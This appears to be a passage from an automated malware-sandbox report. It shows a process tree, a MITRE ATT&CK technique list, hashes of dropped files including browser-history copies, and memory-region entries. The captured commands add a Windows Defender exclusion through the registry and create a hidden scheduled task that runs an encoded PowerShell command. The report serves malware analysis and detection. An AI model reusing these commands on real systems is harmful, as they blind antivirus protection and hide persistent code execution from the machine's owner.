    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gLbKcqvTyliDAKYm /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gLbKcqvTyliDAKYm /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4452
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "glZwGcwBB" /SC once /ST 01:12:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:2076
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "glZwGcwBB"
  2⤵
  PID:4340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:2612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe

Filesize
204KB

MD5
cbcdf56c8a2788ed761ad3178e2d6e9c

SHA1
bdee21667760bc0df3046d6073a05d779fdc82cb

SHA256
e9265a40e5ee5302e8e225ea39a67d452eaac20370f8b2828340ba079abbbfd3

SHA512
5f68e7dffdd3424e0eb2e5cd3d05f8b6ba497aab9408702505341b2c89f265ebb4f9177611d51b9a56629a564431421f3ecb8b25eb08fb2c54dfeddecb9e9f2e

Download Submit
C:\Program Files (x86)\GUMD0A4.tmp\@PaxHeader

Filesize
28B

MD5
2354fd14dbe8037a57837cc5468d30d5

SHA1
4c7244f427d9a96ad7ad532420d3c35fd8347f0d

SHA256
1bde4ea8eb002aaccbc0d233fe071edb968782c955adc1101397bfc420c7efce

SHA512
2fdfde1e09cd6df0c38364e9d9a32850f21b004c8d6536b44d6c4f78c5f8014a5e2df41f9c58760bce625cb3fb095981df05f46ba812fe1c1a41833fd630139e

Download Submit
C:\Program Files (x86)\GUMD0A4.tmp\@PaxHeader

Filesize
27B

MD5
fc8ee03b2a65f381e4245432d5fef60e

SHA1
d2b7d9be66c75ccf24fcb45a6d0dacedd8b6dd6f

SHA256
751a04263c2ebb889fdcd11045d6f3602690318ebaaa54f66e1332d76dde9ef4

SHA512
0837f2b22c9629990165c5e070e710a69ad4951b7fcfe28bd52354c4b8a7246672497b8aaf521a8773c7ec2a4249fc4318330948ab0d8db8c6c74da57b32f1c4

Download Submit
C:\Program Files (x86)\GUMD0A4.tmp\AVGBrowserCrashHandler.exe

Filesize
149KB

MD5
f73e60370efe16a6d985e564275612da

SHA1
2f829a0a611ac7add51a6bc50569e75181cdfd58

SHA256
9cf076866935a0c64366efaeff2ec76d45ac816030ebd616fd5defb1870bc30e

SHA512
2e44e87c285bb7b72d45c8119d08ea6f2d13cea77cf0005a3cf530790bb86c7f2df7c5edac9d86c9d7214abb224738c3bf6b31f6bf104051512bb1de133042dc

Download Submit
C:\Program Files (x86)\GUMD0A4.tmp\AVGBrowserUpdateCore.exe

Filesize
512KB

MD5
dd5dc945cd848bf503862d0a68c3ea5d

SHA1
9b277a0c733ed5698b0656da8c3b99d2f90c7ef8

SHA256
8cc98345e367b083f545ace66d93bf69e03a4fa08b84805a9925fa4c94ef3f8f

SHA512
f6eab8422bde24d89a7723c6175b4197a50e18aa0bb5b8f419e5a23b265d85dcaacaf136b8f6ef6bbf2bd6c0eaecd8f86093f594fb98e596f4b39e9c6ff227e1

Download Submit
C:\Program Files (x86)\GUMD0A4.tmp\goopdate.dll

Filesize
1.4MB

MD5
04a6438c50564146e880c5eb9d57905e

SHA1
edf5d454de99159d832cc9bd0d8dbe132d749804

SHA256
26109d47bf9960e531888e6c545ca8cfc24fee2202b549df29fb8bf9c58e0812

SHA512
8705d0ab2f8a6c1ef567ad00b33ff2cca01391b105eb0ade201d981f091e4ba87e709860ab9849bf9781698fb42ab8efe53ea731af310781766bace1eb1dc19d

Download Submit
C:\Program Files (x86)\GUMD0A4.tmp\goopdateres_en.dll

Filesize
42KB

MD5
418853fe486d8c021d0cca2e85a63d63

SHA1
9504500a7b5076579d74c23294df4bdb1b7c517d

SHA256
4cbb2591c1eeda32bcf295685c993ce4d16acc968697fa12e2a00a1b7c4b37a3

SHA512
dc2ab4e2056e6d73a274d700bc16f75c7c687b35874029c1908b183428dec010373045d4a52eb3f5745f8b91d624cf5d40cd7f37e353f3a41348e2a054a266a3

Download Submit
C:\Program Files\AVG\Browser\Application\125.0.25186.78\Installer\setup.exe

Filesize
638KB

MD5
6d09eafa5d16f9dcf7b43751459f410e

SHA1
2baf47e9b67bffe45bfe63f8dd9a771e2f954fc1

SHA256
4dd77c7549ce4272395cf5ed9463874c5259b003d21c5af9769e3c8f4024718c

SHA512
da5bb82268c696e85f4c2b6e7e5c044a388186b5e6928df624af1a65969c8b2f70b9da07e077d5d0085b636ad485f4b54acd244213759e62ac372c66fd40539a

Download Submit
C:\ProgramData\CAKKJKKECFID\FHCAEG

Filesize
100KB

MD5
baa675ce4124ca3fc5033e2a2c53dbd1

SHA1
2dcc5513270c723fff6148dd2f8196081f83bb16

SHA256
22cc36f18e7df98e3c58cd6fce492688970d4a5d1fb1865e5749b76138cdd9f4

SHA512
047d4d9a7d415d5a4814acc42f9148c0de7ec34c5d53cc90cdcbb218406b343a3c5a1f5ec4cc3b8ccca6b7f08ed0115b7e568a5141e1335c2a2a6ed2682b45ec

Download Submit
C:\ProgramData\DBGHDGHCGHCA\EHJJKF

Filesize
20KB

MD5
42c395b8db48b6ce3d34c301d1eba9d5

SHA1
b7cfa3de344814bec105391663c0df4a74310996

SHA256
5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

SHA512
7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

Download Submit
C:\ProgramData\DBGHDGHCGHCA\GIIJEB

Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
28854213fdaa59751b2b4cfe772289cc

SHA1
fa7058052780f4b856dc2d56b88163ed55deb6ab

SHA256
7c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915

SHA512
1e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4

Download Submit
C:\Users\Admin\AppData\Local\Moon VideoToAudio\moonvideo2audio32.exe

Filesize
2.4MB

MD5
f6c73ce736815327692ede0d9456c529

SHA1
b234d5e6e6d6c371c2a7c31ba661503e2d9b74ea

SHA256
d97a811fef44ae13d544512d5742766c3092785b86a4ef6208f49fe89822c406

SHA512
dcd00762b8f521a8b6b76eb591a2c8aa6063b3a64bb4c7b983acbce34d532b3e95c9aa5b04a8b01dee8542ac39883f1932c50cec97b9cd4292930b2287bdedbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D33.tmp\Install.exe

Filesize
6.3MB

MD5
c735928b8df5f0feed442f144d3b38a3

SHA1
f08bb1ff1a3bb21d2ef6dfc13be09e3a92ecd87a

SHA256
b4e62656cfccafe0d34da23b9492cd23554ed130d1f208ac5ed1b0ef68be5d16

SHA512
f64e1b42edf339f43d13f8b80a31c543a63eed3f0bae69aa9a4628452e48c20824e84d1e8bf30059175ac63cd4e72df7ec66523535f2841d965f85f755c841be

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS9C17.tmp\Install.exe

Filesize
6.7MB

MD5
b4ef95e882fde8174e2c403933235f37

SHA1
f12c45141684417134f4f233bfb988653a78ed68

SHA256
538e6f897d7e83021ee8271a1659cc2f0113fdcbd6597d59e36fe8ac7485c091

SHA512
dfd270d9b2ac20a35c049352c2d1c40c99893b64a756c26ec5b7a09ed51786bb010a2d79d00383d34ddb341104c6fd6d59200d395fdfb7f140321823c9d78883

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0s2cg4sr.gmd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ajB520.exe

Filesize
5.8MB

MD5
acb51434fd82eb460b052f05950b8dca

SHA1
707d192db2ce7cefdefce3037dfb85a18b8811f3

SHA256
29ffa251cb267969af445eb664df04d1a7badbcade61a7f754de42b6d4340055

SHA512
013dc0abcc9760c6298b7e48007eb1ac4bc2e453f06c1ce4aff218f50cd1e2c4bb44ad6bc5687edb057df8b0e38fa0aaada7a8d045ed08412278d3031527229d

Download Submit
C:\Users\Admin\AppData\Local\Temp\avg-securebrowser-web-tags

Filesize
53B

MD5
4c94408946d796a8b19c17df5cf0562d

SHA1
89056150d90683f9548dadc308eb2789a67c2a47

SHA256
68042cb47d900c4110ffc5f46e5f8395b35f42d33fc75e58ee34c7f5d8726de7

SHA512
96a31f0b7254f42fec787233e2d11991709bc0b2514d163dd1f7696015e7318f9810d9811473fc13d6782d65e40f6a94fe6a7ffef3cb962032cff3bfe8b99a29

Download Submit
C:\Users\Admin\AppData\Local\Temp\cfcvmoiy.exe

Filesize
9.0MB

MD5
714b355b97b7fcaded4376e7f5cab9e4

SHA1
703b94af693df1526e5d02d8510ae6f08a831c8c

SHA256
f1e2a7483c2dbf96ec036307093d9ec34e0209eb595c323901d97e433ee8d304

SHA512
625ec992db1deaadc10363c0f36bceb5b16eccaaa3031690a7da15388ed5a0549ffc6ee3a96499fb64d97147c63b29793bb447b0f3ccc04bdfe258204e0ff1f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-12DLQ.tmp\QJ4lvEujT8VBQNIqhfhxIiKK.tmp

Filesize
680KB

MD5
8ebef6645baa32451781267511737482

SHA1
2d8429a0137dbc67866dcb9faeb11eba1a2a617d

SHA256
205e7c503d2c5a7429ef51c23413577c06ff2672dd3d201a84182fdfc6788923

SHA512
ff8ae39ba9168ec2ecaacc6c87337a43879085b55fd1e4213f57c097327611aa931b8e30e8684752029759b2ad4cababef1af446490756caddd22bae2405666e

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-1MGM9.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsp8E6D.tmp\JsisPlugins.dll

Filesize
2.1MB

MD5
bd94620c8a3496f0922d7a443c750047

SHA1
23c4cb2b4d5f5256e76e54969e7e352263abf057

SHA256
c0af9e25c35650f43de4e8a57bb89d43099beead4ca6af6be846319ff84d7644

SHA512
954006d27ed365fdf54327d64f05b950c2f0881e395257b87ba8e4cc608ec4771deb490d57dc988571a2e66f730e04e8fe16f356a06070abda1de9f3b0c3da68

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsp8E6D.tmp\StdUtils.dll

Filesize
195KB

MD5
7602b88d488e54b717a7086605cd6d8d

SHA1
c01200d911e744bdffa7f31b3c23068971494485

SHA256
2640e4f09aa4c117036bfddd12dc02834e66400392761386bd1fe172a6ddfa11

SHA512
a11b68bdaecc1fe3d04246cfd62dd1bb4ef5f360125b40dadf8d475e603e14f24cf35335e01e985f0e7adcf785fdf6c57c7856722bc8dcb4dd2a1f817b1dde3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsp8E6D.tmp\jsis.dll

Filesize
127KB

MD5
4b27df9758c01833e92c51c24ce9e1d5

SHA1
c3e227564de6808e542d2a91bbc70653cf88d040

SHA256
d37408f77b7a4e7c60800b6d60c47305b487e8e21c82a416784864bd9f26e7bb

SHA512
666f1b99d65169ec5b8bc41cdbbc5fe06bcb9872b7d628cb5ece051630a38678291ddc84862101c727f386c75b750c067177e6e67c1f69ab9f5c2e24367659f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsp8E6D.tmp\nsJSON.dll

Filesize
36KB

MD5
ddb56a646aea54615b29ce7df8cd31b8

SHA1
0ea1a1528faafd930ddceb226d9deaf4fa53c8b2

SHA256
07e602c54086a8fa111f83a38c2f3ee239f49328990212c2b3a295fade2b5069

SHA512
5d5d6ee7ac7454a72059be736ec8da82572f56e86454c5cbfe26e7956752b6df845a6b0fada76d92473033ca68cd9f87c8e60ac664320b015bb352915abe33c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsp8E6D.tmp\thirdparty.dll

Filesize
93KB

MD5
070335e8e52a288bdb45db1c840d446b

SHA1
9db1be3d0ab572c5e969fea8d38a217b4d23cab2

SHA256
c8cf0cf1c2b8b14cbedfe621d81a79c80d70f587d698ad6dfb54bbe8e346fbbc

SHA512
6f49b82c5dbb84070794bae21b86e39d47f1a133b25e09f6a237689fd58b7338ae95440ae52c83fda92466d723385a1ceaf335284d4506757a508abff9d4b44c

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsqB6F4.tmp\AVGBrowserUpdateSetup.exe

Filesize
1.6MB

MD5
9750ea6c750629d2ca971ab1c074dc9d

SHA1
7df3d1615bec8f5da86a548f45f139739bde286b

SHA256
cd1c5c7635d7e4e56287f87588dea791cf52b8d49ae599b60efb1b4c3567bc9c

SHA512
2ecbe819085bb9903a1a1fb6c796ad3b51617dd1fd03234c86e7d830b32a11fbcbff6cdc0191180d368497de2102319b0f56bfd5d8ac06d4f96585164801a04b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsqB6F4.tmp\CR.History.tmp

Filesize
192KB

MD5
99f9e1d0e6242010707fea4814c5d1cc

SHA1
611cd9346a29f73337cc984f18885c34454e2689

SHA256
82d690db648e3899eaef9c74b934da29980758295be66edde20716ce3e108074

SHA512
aefcd24d55be3c50585d9c1afcdb05702fdbe08572fbab25e6a48e6ced3239cb7760afc286e6ee16e0fe3d961a9251a19926a34ec3ca81211bd369405a9bbdd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsqB6F4.tmp\CR.History.tmp

Filesize
152KB

MD5
73bd1e15afb04648c24593e8ba13e983

SHA1
4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91

SHA256
aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b

SHA512
6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsqB6F4.tmp\FF.places.tmp

Filesize
5.0MB

MD5
da73e58c9a7d48d2644a2d0cd044943a

SHA1
3b278930bd081c09c87252f38433d7f929c13bbe

SHA256
3113b5d1f943800cb0c7f98c90ec4d248f7077602011c73bb2bda8cdc4a6f891

SHA512
8baeca30e6e624d45ca29ad8f374a156ca09fd104429588e8b356a73de8f9a48a40be14b18a26c4de0fb377ac7c46d2dec4d3c1546d84ef7102c8adf5db3159e

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsqB6F4.tmp\Midex.dll

Filesize
126KB

MD5
581c4a0b8de60868b89074fe94eb27b9

SHA1
70b8bdfddb08164f9d52033305d535b7db2599f6

SHA256
b13c23af49da0a21959e564cbca8e6b94c181c5eeb95150b29c94ff6afb8f9dd

SHA512
94290e72871c622fc32e9661719066bafb9b393e10ed397cae8a6f0c8be6ed0df88e5414f39bc528bf9a81980bdcb621745b6c712f4878f0447595cec59ee33d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCFFD.tmp

Filesize
56KB

MD5
5be7f6f434724dfcc01e8b2b0e753bbe

SHA1
ef1078290de6b5700ff6e804a79beba16c99ba3e

SHA256
4064b300ca1a67a3086e1adb18001c0017384b8f84ff4c0e693858889cef2196

SHA512
3b470c3ad5be3dd7721548021a818034584bbd88237b1710ce52ac67e04126fff4592c02f5868ebda72f662ec8c5f7fc4d0a458f49fe5eb47e024a5c50935ee2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD02F.tmp

Filesize
228KB

MD5
639d1ca3d11d16ba3e25d0bb0efd98c4

SHA1
89747a3f8e1730a7d75e36b43d256b4e58f522f9

SHA256
fac6d8f85ccdf1d77b96c6e81242836079c15098c4d703e20bd79fdc2341dac1

SHA512
dea5c1a4d9155e7c4971ed7478be169fbba0a35877598541483560374e56db3bbaeb5159c715eaacec3f607161786e326ac58b40441923de8bb4bea46e0111fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\{F675F609-270A-42EB-9441-943A665E91C0}\scrt.dll

Filesize
5.7MB

MD5
f36f05628b515262db197b15c7065b40

SHA1
74a8005379f26dd0de952acab4e3fc5459cde243

SHA256
67abd9e211b354fa222e7926c2876c4b3a7aca239c0af47c756ee1b6db6e6d31

SHA512
280390b1cf1b6b1e75eaa157adaf89135963d366b48686d48921a654527f9c1505c195ca1fc16dc85b8f13b2994841ca7877a63af708883418a1d588afa3dbe8

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\7bhyz3LpAvvVyJ3C065BJNmg.exe

Filesize
262KB

MD5
350612832707e982d4df52e1c9443d41

SHA1
083a894aa3fb29cfc5ef89ffb483d234a6671216

SHA256
5dca841a280946ff359424cd03cd09d7a7566a5c6426d590b10df8336c5ec330

SHA512
becc7841d63c1d9b3871d471fac798fa7271dbcc341b0956b779fb688d628dd8fd0f2a85954ac7c695814f5c107337cd8833bda5a8d1cea33d0b1d16008a93b3

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\PY6JR66TX_lJW87EhbKf9G5y.exe

Filesize
10.9MB

MD5
d43ac79abe604caffefe6313617079a3

SHA1
b3587d3fa524761b207f812e11dd807062892335

SHA256
8b750884259dd004300a84505be782d05fca2e487a66484765a4a1e357b7c399

SHA512
bb22c73ed01ff97b73feb68ae2611b70ef002d1829035f58a4ba84c5a217db368aae8bdc02cdec59c1121922a207c662aa5f0a93377537da42657dd787587082

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\QJ4lvEujT8VBQNIqhfhxIiKK.exe

Filesize
4.6MB

MD5
4ecac60bcb0ebc8f268ea8cae2cc46ec

SHA1
0e0f083c10b3a828bff4b90c3f62d3f292691f99

SHA256
7aa2680b83656ff7cbfe453c3b0e9b874cbe9b8b0d19ff26317b35672f8405d6

SHA512
5e199ac24ad91a7f41cc96e37d7521917a7aa28a90b633239e602dc1fb26906f4f5b7ac06d9d9b2ef8145ddeeb6a7e353248a51a209408cd4eaf2c5a0d4fd9c5

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\RK6d9SGWLE1AvpyzYT3Q8Ywv.exe

Filesize
465KB

MD5
6b115a0acf6309ed0aeaa1902478b74d

SHA1
41bd03cd123942ed5d028737dfd563d4be26b62f

SHA256
0ca17a5753a610461135a3807a82ba476fbf3180abcb26ebff5a95f77302c224

SHA512
9003865cb932b8af404de4a9a0a39e5338f9d7a8332b1830e017d35063e950050d0701a34b5ffeb85b492bfdfaed44573e77f662b4c891bd552b84ad51b85d15

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\b3PG7xBdfbKLfPJZCZ0tmzAD.exe

Filesize
7.2MB

MD5
69604f5bf8841d2a3f822152d8aa44f6

SHA1
0cbfad02b3f669c34056d856259caf40ad9ed98d

SHA256
9569c17504741ba31a6245e7202b961080044b76c8bd9e9ebdb995f76de18ec2

SHA512
6dc64ccb7d5d38e326c7932de4e851d443ec6b03b8167e95558e25fe57a0daab60a8e8c07f6293929d5cafe9f563dfbfecea27bbfffa1799ce09cd8b38a4b9a8

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\dgNvhupeeLIaker_Kh0LbY9P.exe

Filesize
421KB

MD5
1fc71d8e8cb831924bdc7f36a9df1741

SHA1
8b1023a5314ad55d221e10fe13c3d2ec93506a6c

SHA256
609ef2b560381e8385a71a4a961afc94a1e1d19352414a591cd05217e9314625

SHA512
46e5e2e57cb46a96c5645555809713ff9e1a560d2ad7731117ef487d389319f97a339c3427385a313883a45c2b8d17ce9eec5ca2094efa3d432dd03d0ca3bb28

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\jnUIUmQJ3EohHeAUoNAO8Ye0.exe

Filesize
1.3MB

MD5
6367f0bd4486825ce6d2ade9140b8db8

SHA1
26d8100dc48eb89847330b47981e5e1759c04916

SHA256
2410f733df6007ded718bc8cfd9ff0a0624b36be8f6b333c5327a4b314cffd71

SHA512
a2851d78ee03d63936257890162242b429111bb100f65981e518f70413ec077d0c656d78c64957af40bae11ab627efb8d8efcb3947a83a71c902160919ce4ad8

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\nEX0SJjrh2Bbn6QqITUIr5fu.exe

Filesize
432KB

MD5
7dc8189f70cc34e18ea7af8fdeac4142

SHA1
8cb698efdf5971e0805dd0f0fb0457315490c777

SHA256
a3608a51db9df14c42f8c6e37ac49969de70b4be0862d82b5823c00aed395f9d

SHA512
9bb17829724af371d383874b8ed4efe09f7f518fa131d68dd02ae0a149b0506f42b2694d7ec9a59b591b28fdcd620b68116e1170cd489b396d294126332e93ac

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\nUKhCGwsZ00hZOrQREClgXMh.exe

Filesize
2.5MB

MD5
9bf1ce5a241d5099c208de8c55b314ad

SHA1
bebf228a6055a714b0ab5ac36bc348c03d726565

SHA256
0a4dd5ef0b377904bab0a67b97bb74c15900d882de759394ae9114f1f61f90a5

SHA512
cd9116a93573e4d524bc9a8f7861a5c376b7119e9510d02a849bf8bc962dc09cfd80e64f1d774377259c15135709cf14b60f481be0e29c2357e5e591449f6f39

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\nUKhCGwsZ00hZOrQREClgXMh.exe

Filesize
2.5MB

MD5
344e21ce3a390dc89b9965770859f9c5

SHA1
61cb37d70470e2d6f56cd1324136d9316359a9a9

SHA256
f68e7282ed7df9a76ec492e06330c4ba4a1faf5a357795b41ab2c0743955d364

SHA512
c42a893405b820676c8b8b254fc17deea8b81f0f15e235322901c8d85aaa41781d9a64d01f76871d916dfceab20856ca6509df45fc853945123e80a98c1bcbdf

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\oVkLEolkKst_7DpraKHne2cj.exe

Filesize
545KB

MD5
cc57562764c9ba73ef6bf0f056e12e30

SHA1
97147bf2317534d7908e18ad1139d2bf04e54990

SHA256
5db086810e23a0a6d59a3cd203a59039a2f99f4914a07e9f60955e5d522a5675

SHA512
ddbe6484f9f4d98b0ad09a017733599bc62da20e02549d1751c11d9f460c8c95ec0d1563cc5c034e6a7b15d36ca8a3febe2cf7a7aae7e138d1e5e4feea42019b

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\rKabpfuRcT2t4Plzk0ocnBr8.exe

Filesize
2.6MB

MD5
2fa21c3a99d1a4a0b699e28ce79adbbc

SHA1
d3ac9e730f36be11defd1faa8e3dc6aac4bea142

SHA256
c33d724b4c3a935b2ca38a4ea074d643f3e1f5cc53c0f6d8463d30ddb63c8446

SHA512
b7445038b0773ad36270a40d83bd34a2fb42f9298e27629ac6b744047ba47f762ec8976f663659d844464713e48c75d5a2b6586c78d94672a551ebe974ee9fb8

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\uX8PYYcq_TwO8HXcs8ccDdDm.exe

Filesize
5.8MB

MD5
60feb08011db31607cee2a5bc1f2206f

SHA1
f8f680a3a8ca7eb2058eebdf2f25a95904780988

SHA256
20a6c6e35c32583f23b8701d14233fccec6fc68d6fc78dcffbb4da1c53b6b9d2

SHA512
71db5d12fd3717085b67fe93b671e0f5f7124e1cc3141197572666bc2f914c9b67ba661d49007ea05c7b0cf05345e376ec3894af6696d120957dbb6ce32d3a87

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\uqxXz2hM83zG7WZ_wXYxN3uY.exe

Filesize
231KB

MD5
8597c4f8451265d140c3f0ac055bb512

SHA1
400850a846e9f9857b66186cee2a472612a13be5

SHA256
469a6cba41b1c708127c6cfefe535e19dbb60f659c079e6587c69ce74beec21b

SHA512
d7f1a806019573630759c848448f9c01031cebcf61676a1a276780bceebcc011b1b27145cc8fe34d0994ed58c84a173f7f47fcb4156e73b7e9c27392218f5da2

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\yVJbaIuNv6XbsMfOSQcyPNFs.exe

Filesize
4.3MB

MD5
f118c74ba8305f81998e140621d18332

SHA1
03adb7b0ed8d492ed79f77cbf4edcda0f8ee2bbb

SHA256
43ac69a7de42f11ed7f8f91b251e4479e8898752f0e055063c9d8a7e993fd9e6

SHA512
7aa065d69f81850c995967f4db4277da07b81f42aeb596e500371305ca3716c473fc4d6bb43a16efff11d176aa943eca846c346667d3f8b4fb561a0cffb4d6b0

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\yVJbaIuNv6XbsMfOSQcyPNFs.exe

Filesize
4.3MB

MD5
b654250bca80b165af1416282dae2a17

SHA1
172e9e9b58eb9b063b0a961e6504331b1868088e

SHA256
b8f56d3f8d37ea702b4ce3b8be7cbe92af2fc98e9ffd7449addb4f6285cd9641

SHA512
f5a8be43cf3112684d1e62c2825caeb5d7d027602258f768110222c9603ba5ede520c4de5b8e879553544da64b84ca15c51e78109c1706071ec9d3993a9adadb

Download Submit
C:\Windows\SysWOW64\vcxznuer\cfcvmoiy.exe

Filesize
5.3MB

MD5
c11075810d25774efc071c81eb21ef1f

SHA1
e7dd2e76e5d6cb4b1aeea603b88bf69f22cc5df7

SHA256
a653c2cd96b46c9098112fc46d736aa5b807e33c03b69722fb96c753b93a38fa

SHA512
068f52ab6d80a27b8e1d2b484eea366ae53fedd5f41ed443a5c470bb17aac5bef32c665d1a0606a3ba5caed0a1a5be7440a0736ad3f2d45be68976563eea8029

Download Submit
memory/640-280-0x0000000005C60000-0x0000000005D46000-memory.dmp

Filesize
920KB

Download
memory/640-276-0x0000000005A90000-0x0000000005B90000-memory.dmp

Filesize
1024KB

Download
memory/640-259-0x0000000000E70000-0x0000000001100000-memory.dmp

Filesize
2.6MB

Download
memory/1548-220-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1576-273-0x0000000000830000-0x0000000000831000-memory.dmp

Filesize
4KB

Download
memory/1752-1132-0x0000000006D90000-0x0000000006DAA000-memory.dmp

Filesize
104KB

Download
memory/1752-1131-0x0000000007840000-0x00000000078D6000-memory.dmp

Filesize
600KB

Download
memory/1752-1133-0x0000000006DE0000-0x0000000006E02000-memory.dmp

Filesize
136KB

Download
memory/1752-1204-0x0000000005160000-0x00000000051AC000-memory.dmp

Filesize
304KB

Download
memory/1752-1105-0x00000000062F0000-0x0000000006644000-memory.dmp

Filesize
3.3MB

Download
memory/1752-1200-0x0000000004B20000-0x0000000004E74000-memory.dmp

Filesize
3.3MB

Download
memory/1924-274-0x0000000000400000-0x000000000045C000-memory.dmp

Filesize
368KB

Download
memory/1924-272-0x0000000000400000-0x000000000045C000-memory.dmp

Filesize
368KB

Download
memory/2612-1280-0x000001BA71FF0000-0x000001BA72012000-memory.dmp

Filesize
136KB

Download
memory/3100-1220-0x0000000004950000-0x0000000004CA4000-memory.dmp

Filesize
3.3MB

Download
memory/3100-1225-0x0000000005540000-0x000000000558C000-memory.dmp

Filesize
304KB

Download
memory/3376-294-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
